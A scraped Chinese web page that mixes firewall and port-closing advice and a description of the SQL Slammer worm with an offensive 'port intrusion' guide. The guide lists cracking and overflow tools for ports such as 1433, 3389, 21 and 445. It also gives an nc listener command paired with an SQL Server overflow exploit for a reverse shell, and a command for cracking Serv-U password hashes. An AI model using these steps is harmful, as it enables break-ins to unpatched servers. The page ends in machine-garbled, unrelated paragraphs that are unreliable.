有人在局域网内开扫描器扫描大范围扫描。
这个已经被防火墙拦截了,你可以无视他,觉得障眼也可以取消警告提示。个人计算机没什么大的问题,可能是黑客攻击一扫而过,如果是服务器你就要注意了。
解决办法:在局域网内,揪出恶意扫描人。在公网的话,你可以屏蔽该IP或IP段。
这个是你的端口被开启了,它会相应黑客端口的探查,从而攻击你,你使用windows自带的防火墙打开,这样你的电脑端口自动隐藏,黑客也就探查不到你的端口了.你可以在开启防火墙后去的赛门铁克的在线安全检测端口是否还是暴露.
“蠕虫王”是一个极为罕见且极其短小的蠕虫病毒,英文名为Worm.SQLexp.376,主要通过 Microsoft SQL Server的漏洞发动攻击,极具破坏力。 蠕虫王蠕虫病毒仅在内存中传播,没有文件载体,其长度仅有376字节。但其传播速度 极快,且使用广播数据包方式发送自身代码,每次均攻击子网中所有可能存在机器。易受 “蠕虫王”攻击的机器类型为所有安装有Microsoft SQL Server 2000并且没有修补漏洞的 NT系列服务器,包括WinNT/Win2000/WinXP等,不会感染Win9X系统。由于蠕虫王并不对是 否已经侵入系统作判定,所以其不停的入侵将会造成拒绝服务式攻击,从而导致被攻击机 器因瘫痪而停止服务,危害极为惊人。
SQLExp.Worm,病毒体极其短小,却具有极强的传播性,它利用Microsoft SQL Server的漏洞
进行传播,由于Microsoft SQL Server在世界范围内都很普及,因此此 ... 请在线升级您的
金山毒霸,即可查杀该病毒!
有人在局域网内开扫描器扫描大范围扫描。
这个已经被防火墙拦截了,你可以无视他,觉得障眼也可以取消警告提示。个人计算机没什么大的问题,可能是黑客攻击一扫而过,如果是服务器你就要注意了。
解决办法:在局域网内,揪出恶意扫描人。在公网的话,你可以屏蔽该IP或IP段。
只开放必要的端口,关闭其余端口.因为在系统安装好后缺省情况下,一般都有缺省的端口对外开放,
黑客就会利用扫描工具扫描那些端口可以利用,这对安全是一个严重威胁。
端口 协议 应用程序
21 TCP FTP
25 TCP SMTP
53 TCP DNS
80 TCP HTTP SERVER
1433 TCP SQL SERVER
5631 TCP PCANYWHERE
5632 UDP PCANYWHERE
6(非端口) IP协议
8(非端口) IP协议
将下面的端口关闭
TCP
21
22
23
25 TCP SMTP
53 TCP DNS
80
135 epmap
138 [冲击波]
139 smb
445
1025 DCE/1ff70682-0a51-30e8-076d-740be8cee98b
1026 DCE/12345778-1234-abcd-ef00-0123456789ac
1433 TCP SQL SERVER
5631 TCP PCANYWHERE
5632 UDP PCANYWHERE
3389
4444[冲击波]
4489
UDP
67[冲击波]
137 netbios-ns
161 An SNMP Agent is running/ Default community names of the SNMP Agent
端口入侵:
1. 1433端口入侵
scanport.exe 查有1433的机器
SQLScanPass.exe 进行字典暴破(字典是关键)
最后 SQLTools.exe入侵
=============================
对sql的sp2及以下的系统,可用sql的hello 溢出漏洞入侵。
nc -vv -l -p 本机端口 sqlhelloF.exe 入侵ip 1433 本机ip 本机端口
(以上反向的,测试成功)
sqlhelloz.exe 入侵ip 1433 (这个是正向连接)
2. 4899端口入侵
用4899过滤器.exe,扫描空口令的机器
3. 3899的入侵
对很早的机器,可以试试3389的溢出(win3389ex.exe)
对2000的机器,可以试试字典暴破。(tscrack.exe)
4. 80入侵
对sp3以前的机器,可以用webdav入侵;
对bbs论坛,可以试试上传漏洞(upfile.exe或dvup_delphi.exe)
可以利用SQL进行注入。(小榕的注入软件)。
5. serv-u入侵(21端口)
对5. 004及以下系统,可用溢出入侵。(serv5004.exe)
对5.1.0.0及以下系统,可用本地提升权限。(servlocal.exe)
======================================
对serv-u的MD5加密密码,可以用字典暴破。(crack.vbs)
输入一个被serv-u加密的密码(34位长),通过与字典档(dict.txt)的比较,得到密码。如:cscript crack.vbs ib0AD10648F17E9E8D1FF316C1BA75105A
6. 554端口
用real554.exe入侵。
7. 6129端口
用DameWare6129.exe入侵。
8. 系统漏洞
利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞,
进行溢出入侵。
9. 3127等端口
可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)。
10. 其他入侵
利用shanlu的入侵软件入侵(WINNTAutoAttack.exe)。
为了真正提到下尔镇农村基本 私人卫生和熟悉的工作 名称治理 的程度,实际 真实的农村基本 私人卫生和熟悉的工作...
亲爱的引导 战争党员同道 ,昨天对尔来说是一个非常 容易记住的日子。因为 昨天,尔末成为了一名邪恶的外国共产党...
很多 没有人知道如何写毕业 论文。他们真的对付了 第一次写论文的同学 ,更不用说他们了?你知道如何写毕业 论文...
对嫩板的个怀疑的感激 怀疑:你胆小!我在你的美容院工作了一个多月。有了你尽可能多的种植,我别无选择,只能从一个...
在尝试的时候 ,我们都需要 停止自我推荐 。看 很多 员工,尝试的自我推荐 也是一个非常重要的 环节,那么如何...
优越的职场礼仪 战争职业教育 是一个好 员工必备的基本 技能 。除了事情 ,我们的每一句话都必须 礼仪 标准化...